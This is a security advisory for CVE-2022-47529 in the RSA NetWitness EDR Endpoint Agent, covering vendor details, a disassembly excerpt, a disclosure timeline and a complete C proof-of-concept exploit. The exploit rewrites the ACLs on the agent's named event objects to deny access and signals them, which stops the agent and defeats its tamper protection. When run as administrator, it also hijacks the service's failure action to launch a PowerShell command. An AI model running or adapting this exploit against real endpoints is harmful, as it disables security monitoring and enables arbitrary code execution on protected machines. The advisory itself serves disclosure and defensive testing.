RSA NetWitness Platform EDR Agent / Incorrect Access Control - Code Execution / CVE-2022-47529

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Risk: Medium
Local: Yes
Remote: Yes

[+] Credits: John Page (aka hyp3rlinx) [+] Website: [+] Source: [+] [+] ISR: ApparitionSec [Vendor] RSA Security [Product] NetWitness Endpoint EDR Agent The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints-on and off the network-providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response. [Vulnerability Type] Incorrect Access Control / Code Execution [CVE Reference] CVE-2022-47529 [Security Issue] CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report. SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe [Severity] Critical [Impact(s)] Denial-of-Service Arbitrary Code Execution [Attack Vector] To exploit, open handle to memory objects held by the endpoint agent, modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group [Affected Product Code Base] All versions prior to v12.2 [Network Access] Local [References] [Vuln Code Block]: 00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:00000001400F7B10 ; sub_14013BA50+19?p .text:00000001400F7B10 ; DATA XREF: ... .text:00000001400F7B10 push rbx .text:00000001400F7B12 sub rsp, 20h .text:00000001400F7B16 mov rbx, rcx .text:00000001400F7B19 test rcx, rcx .text:00000001400F7B1C jz short loc_1400F7B5C .text:00000001400F7B1E call cs:InitializeCriticalSection .text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:00000001400F7B28 call cs:InitializeCriticalSection .text:00000001400F7B2E mov edx, 1 ; bManualReset .text:00000001400F7B33 xor r9d, r9d ; lpName .text:00000001400F7B36 mov r8d, edx ; bInitialState .text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes .text:00000001400F7B3B call cs:CreateEventW .text:00000001400F7B41 mov [rbx+50h], rax .text:00000001400F7B45 mov dword ptr [rbx+58h], 0 .text:00000001400F7B4C test rax, rax .text:00000001400F7B4F jz short loc_1400F7B5C [Exploit/POC] "RSA_NetWitness_Exploit.c" #include "windows.h" #include "stdio.h" #include "accctrl.h" #include "aclapi.h" #define OPEN_ALL_ACCESS 0x1F0003 /* RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution RSA NetWitness.msi --> NWEAgent.exe MD5: c0aa7e52cbf7799161bac9ebefa38d49 Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent. Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user. By John Page (hyp3rlinx) - Nov 2022 DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no harm. X64 PE file vuln code block: 00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:00000001400F7B10 ; sub_14013BA50+19?p .text:00000001400F7B10 ; DATA XREF: ... .text:00000001400F7B10 push rbx .text:00000001400F7B12 sub rsp, 20h .text:00000001400F7B16 mov rbx, rcx .text:00000001400F7B19 test rcx, rcx .text:00000001400F7B1C jz short loc_1400F7B5C .text:00000001400F7B1E call cs:InitializeCriticalSection .text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:00000001400F7B28 call cs:InitializeCriticalSection .text:00000001400F7B2E mov edx, 1 ; bManualReset .text:00000001400F7B33 xor r9d, r9d ; lpName .text:00000001400F7B36 mov r8d, edx ; bInitialState .text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes .text:00000001400F7B3B call cs:CreateEventW .text:00000001400F7B41 mov [rbx+50h], rax .text:00000001400F7B45 mov dword ptr [rbx+58h], 0 .text:00000001400F7B4C test rax, rax .text:00000001400F7B4F jz short loc_1400F7B5C 1) Install "RSA NetWitness.msi" (Endpoint EDR Agent) 2) Run Exploit PoC as a Standard non-admin user, the PoC will: a) Open a handle (copy) to Ecat002 event. b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group. c) Set/Reset event the Ecat002 handle. d) if admin privs change the EDR service configuration Non vulnerable agents will output "Not vulnerable to the console", customers can modify and use test to see if vuln. */ char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"}; BOOL PWNED=FALSE; void Exploit(); int AdminChl(); void HijackSvcConfig(); int main(void){ printf("[+] RSA NetWitness EDR Agent 0Day\n"); printf("[+] CVE-2022-47529\n"); printf("[+] Discovery: John Page (aka hyp3rlinx)\n"); printf("[+] ===================================\n"); Exploit(); if( AdminChk() ){ printf("[+] Hijacked NetWitness Agent Service!\n"); HijackSvcConfig(); } Sleep(2000); printf("[+] Done!\n\n"); system("pause"); return 0; } void Exploit(){ PACL pOldDACL = NULL; PACL pNewDACL = NULL; HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002"); int i=0; for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){ HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]); if(hEvent != INVALID_HANDLE_VALUE){ printf("[-] Targeting Event: %s\n", Vuln_Events[i]); Sleep(500); if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){ TRUSTEE trustee[1]; trustee[0].TrusteeForm = TRUSTEE_IS_NAME; trustee[0].TrusteeType = TRUSTEE_IS_GROUP; trustee[0].ptstrName = TEXT("Everyone"); trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE; trustee[0].pMultipleTrustee = NULL; EXPLICIT_ACCESS explicit_access_list[1]; ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS)); explicit_access_list[0].grfAccessMode = DENY_ACCESS; explicit_access_list[0].grfAccessPermissions = GENERIC_ALL; explicit_access_list[0].grfInheritance = NO_INHERITANCE; explicit_access_list[0].Trustee = trustee[0]; if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! ", GetLastError()); } if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! ", GetLastError()); }else{ SetEvent(hEvent_Ecat002); Sleep(1000); ResetEvent(hEvent_Ecat002); CloseHandle(hEvent_Ecat002); SetEvent(hEvent); Sleep(1000); PWNED=TRUE; } if(PWNED){ LocalFree(pNewDACL); LocalFree(pOldDACL); CloseHandle(hEvent); } Sleep(1000); } } } } //If run as admin, modify the agent service config to run our own code. int AdminChk(){ int result = 0; HANDLE hToken = NULL; if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){ TOKEN_ELEVATION elevated; DWORD tokSize = sizeof(TOKEN_ELEVATION); if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){ result = elevated.TokenIsElevated; } } if(hToken){ CloseHandle(hToken); } return result; } //Trivial example modify the service config... void HijackSvcConfig(){ Sleep(1000); WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0); } [POC Video URL] [Disclosure Timeline] Vendor Notification: December 2, 2022 CVE assigned: December 19, 2022 Hotfix v12.1.0.1: January 3, 2023 Fixed in v12.2.0.0 January 4, 2023 Restested for vendor: January 6, 2023 March 24, 2023 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

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